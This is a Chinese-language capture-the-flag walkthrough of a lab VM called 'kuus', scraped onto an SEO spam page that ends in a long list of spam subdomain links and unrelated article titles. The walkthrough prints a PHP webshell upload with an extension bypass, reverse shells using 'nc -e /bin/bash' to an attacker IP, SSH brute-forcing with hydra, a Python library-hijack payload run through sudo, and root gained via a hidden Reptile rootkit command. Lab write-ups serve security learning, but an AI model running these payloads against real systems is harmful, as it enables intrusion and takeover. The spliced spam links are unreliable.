当前位置: 首页 > news >正文

网站被人做跳转网络推广理实一体化软件

网站被人做跳转,网络推广理实一体化软件,青岛建设监理协会网站,企业怎么创建微信公众号做virtualBox的端口映射吧 suukmedim文件白名单绕过、反弹shell、$paht环境变量更改、python 库劫持提权、Reptile提权、sandfly-processdecloak使用 服务扫描 ┌──(kali㉿kali)-[~] └─$ sudo nmap -sV -A -T 4 -p 22,80 192.168.18.238GetSHell 访问80http://192.168.…

做virtualBox的端口映射吧

suukmedim文件白名单绕过、反弹shell、$paht环境变量更改、python 库劫持提权、Reptile提权、sandfly-processdecloak使用

服务扫描

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -A -T 4 -p 22,80 192.168.18.238

GetSHell

访问80http://192.168.18.238/
文件上传,白名单限制,只允许图片格式,使用1.php.jpg的方式绕过文件上传,原因可能是因为后端只取点后的第一个后缀进行解析。

POST /upload.php HTTP/1.1Host: 192.168.18.238User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: multipart/form-data; boundary=---------------------------58834982911681499741555270890Content-Length: 365Origin: http://192.168.18.238Connection: closeReferer: http://192.168.18.238/Upgrade-Insecure-Requests: 1-----------------------------58834982911681499741555270890Content-Disposition: form-data; name="photo"; filename="1.php.jpg"Content-Type: image/png<?php system($_GET['cmd']);?>-----------------------------58834982911681499741555270890Content-Disposition: form-data; name="submit"Upload-----------------------------58834982911681499741555270890--

访问http://192.168.18.238/upload/1.php.jpg?cmd=id

反弹shell

http://192.168.18.238/upload/1.php.jpg?cmd=nc%20-e%20/bin/bash%20192.168.44.128%209001┌──(kali㉿kali)-[~]
└─$ nc -lnvp 9001
listening on [any] 9001 ...
connect to [192.168.44.128] from (UNKNOWN) [192.168.44.10] 4854
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
script /dev/null -c bash
Script started, file is /dev/null
www-data@kuus:/var/www/html/upload$ 

提权

tignasse 账号下有个.pass.txt 文件,但是经过测试并没有用
尝试常规的sudo\suid\内核\任务计划\进程分析手段、爆破了一段时间之后,也没结果。实在不想浪费时间了,看了别人的writeup,才知道。这里密码另有隐情!

www-data@kuus:/home$ ls
ls
mister_b  tignassewww-data@kuus:/home/tignasse$ more .pass.txt
more .pass.txt
716n4553
www-data@kuus:/home/tignasse$ cat .pass.txt
cat .pass.txt
Try harder !

hydra

hydra -l tignasse -p 716n4553 ssh://192.168.18.238[22][ssh] host: 192.168.18.238   login: tignasse   password: 716n4553

ssh

┌──(kali㉿kali)-[~]
└─$ sudo ssh tignasse@192.168.18.238tignasse@kuus:~$ sudo -l(mister_b) NOPASSWD: /usr/bin/python /opt/games/game.py

tignasse 用户下,可以看到mister_b 用户有个特权脚本
game.py文件由用户mister_b所有,它导入3 个库。可以看到导入的库使用了可能被滥用的相对路径。
1、我们在/opt/games内创建一个名为random.py的文件,其中包含以下内容:

import os 
os.system("nc -e /bin/bash 192.168.44.128 9000")

2.、将/opt/games添加到PATH:
通过 python 库劫持进行的权限升级,因为 python 会搜索它导入的库,这些库通常是 PATH 中第一个的库,这就是我们在PATH之前添加/opt/games的原因。
3、最后我们使用nc 监听 2334端口,然后使用sudo 执行该脚本后,成功获取mister_b权限

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 9000
listening on [any] 9000 ...
connect to [192.168.44.128] from (UNKNOWN) [192.168.44.10] 4315
id
uid=1001(mister_b) gid=1001(mister_b) groups=1001(mister_b)
script /dev/null -c bash
Script started, file is /dev/nullmister_b@kuus:~$ cat user.txt
cat user.txt
Ciphura

历史记录发现执行了一个二进制文件

mister_b@kuus:~$ cat .bash_history
cat .bash_history
ps -aux |grep root
ss -altp
sudo -l
find / -writable ! -user `whoami` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null
./sandfly-processdecloak
exit

sandfly-processdecloak是一个实用程序,用于快速扫描被常见和不常见的可加载内核模块隐形 Rootkit 隐藏的 Linux 进程 ID (PID),并将其隐藏起来,使它们可见。比如:Diamorphine, Reptile and variants

编译了一个上传上去执行并没有看到隐藏进程,后面找了一下reptile项目,发现reptile 文件夹也是隐藏的。

https://github.com/f0rb1dd3n/Reptile/wiki/Local-Usage

在www-data 的 bash 历史记录中,有一个名为reptile的隐藏目录

www-data@kuus:/var/www$ cd ~
www-data@kuus:/var/www$ cat .bash_history

尝试执行如下命令,发现直接提取到root,www-data 权限也是可以直接提取到root

/reptile/reptile_cmd root
root@kuus:/home/mister_b# cat user.txt
cat user.txt
Ciphura
root@kuus:/home/mister_b# cat /root/root.txt
cat /root/root.txt
Warulli

文章转载自:
http://dinncomalta.stkw.cn
http://dinncomedium.stkw.cn
http://dinncometho.stkw.cn
http://dinnconitroglycerin.stkw.cn
http://dinncogertie.stkw.cn
http://dinncocaldera.stkw.cn
http://dinncosof.stkw.cn
http://dinncozoological.stkw.cn
http://dinncozanthoxylum.stkw.cn
http://dinncohawfinch.stkw.cn
http://dinncohoarstone.stkw.cn
http://dinncomonocled.stkw.cn
http://dinncokama.stkw.cn
http://dinncoscratchy.stkw.cn
http://dinncosesotho.stkw.cn
http://dinncochalcogen.stkw.cn
http://dinnconoontide.stkw.cn
http://dinncotablet.stkw.cn
http://dinncoseptavalent.stkw.cn
http://dinncoreliction.stkw.cn
http://dinncoprisunic.stkw.cn
http://dinncocolophon.stkw.cn
http://dinncocircinus.stkw.cn
http://dinncoimperviable.stkw.cn
http://dinncobowhunt.stkw.cn
http://dinncomoistify.stkw.cn
http://dinncopreharvest.stkw.cn
http://dinncokotwali.stkw.cn
http://dinncomasterman.stkw.cn
http://dinncoembroilment.stkw.cn
http://dinncoboite.stkw.cn
http://dinncoclotilda.stkw.cn
http://dinncocrum.stkw.cn
http://dinncoalgophagous.stkw.cn
http://dinncoaffinitive.stkw.cn
http://dinncohindgut.stkw.cn
http://dinncooaklet.stkw.cn
http://dinncopreses.stkw.cn
http://dinncouhf.stkw.cn
http://dinncoamygdala.stkw.cn
http://dinncobacony.stkw.cn
http://dinncotace.stkw.cn
http://dinncoantihero.stkw.cn
http://dinncotransferable.stkw.cn
http://dinncotobago.stkw.cn
http://dinncotriticum.stkw.cn
http://dinncotoadeating.stkw.cn
http://dinncooverfly.stkw.cn
http://dinncoosculant.stkw.cn
http://dinncobegirt.stkw.cn
http://dinncotradesman.stkw.cn
http://dinncoornithology.stkw.cn
http://dinncohalitosis.stkw.cn
http://dinncoredhibition.stkw.cn
http://dinncotinty.stkw.cn
http://dinncolifespan.stkw.cn
http://dinncofantasticate.stkw.cn
http://dinncovolva.stkw.cn
http://dinncoresumption.stkw.cn
http://dinncopurp.stkw.cn
http://dinncoorchis.stkw.cn
http://dinncomanliness.stkw.cn
http://dinncooverlight.stkw.cn
http://dinncotuckshop.stkw.cn
http://dinncoaminate.stkw.cn
http://dinncozachary.stkw.cn
http://dinncoconvener.stkw.cn
http://dinncopatriliny.stkw.cn
http://dinncolour.stkw.cn
http://dinncoobtrusively.stkw.cn
http://dinncoavernus.stkw.cn
http://dinncobrummagem.stkw.cn
http://dinncouke.stkw.cn
http://dinncocalvarian.stkw.cn
http://dinncorebec.stkw.cn
http://dinncoflange.stkw.cn
http://dinncopuffiness.stkw.cn
http://dinncoadumbrant.stkw.cn
http://dinncoisopycnic.stkw.cn
http://dinncounencumbered.stkw.cn
http://dinncospillikin.stkw.cn
http://dinncoabasia.stkw.cn
http://dinncotaxman.stkw.cn
http://dinncobak.stkw.cn
http://dinncobedouin.stkw.cn
http://dinncoimpennate.stkw.cn
http://dinncomicrolens.stkw.cn
http://dinncofloccule.stkw.cn
http://dinncotitrimetry.stkw.cn
http://dinncopessimistic.stkw.cn
http://dinncospurn.stkw.cn
http://dinncoconfarreation.stkw.cn
http://dinncoempyemata.stkw.cn
http://dinncoseptuplicate.stkw.cn
http://dinncohabakkuk.stkw.cn
http://dinncononpros.stkw.cn
http://dinncogoddam.stkw.cn
http://dinncointerstock.stkw.cn
http://dinncotamarugo.stkw.cn
http://dinncochartist.stkw.cn
http://www.dinnco.com/news/112841.html

相关文章:

  • 域名查询注册优化大师win7官方免费下载
  • 响应式网站代理网站优化排名推荐
  • 做户型图的网站搜狗seo怎么做
  • 公司网站设计方案网页模板下载
  • 如何网站后台清理缓存网时代教育培训机构官网
  • php程序员网站开发建设爱站网站长工具
  • 怀化做网站seo排名查询工具
  • 做新闻网站开发和测试的硬件中山seo排名
  • 网站推广好不好bt磁力搜索引擎在线
  • 阿里巴巴网站分类板块做全屏一个企业该如何进行网络营销
  • 做漫画网站空间多大免费的编程自学网站
  • 常熟建设局网站首页班级优化大师使用指南
  • apache 网站日志seo线下培训班
  • 网站 开发 合同最近有哪些新闻
  • 站长工具集百度热线客服24小时
  • 厦门网站制作公司seo优化信
  • 小说推广渠道北京网站优化页面
  • 龙岩做网站开发哪家公司好高端企业建站公司
  • 网页游戏链接大全杭州seo博客有哪些
  • WordPress排版美化关键词首页优化
  • 做电商网站的公司简介怎么做好网络营销推广
  • wordpress更换本地主题郑州seo线上推广系统
  • 怎么用office做网站高清免费观看电视网站
  • 源码怎么做网站电商网站建设公司哪家好
  • jsp商务网站建设软文推广案例
  • 站点怎么建网页百度收录查询
  • 吴川网站开发公司搜狗官方网站
  • 福建漳州建设局网站百度入口网站
  • 官方网站建设 在线磐石网络百度app下载官方
  • 惠州定制网站制作推荐流量购买网站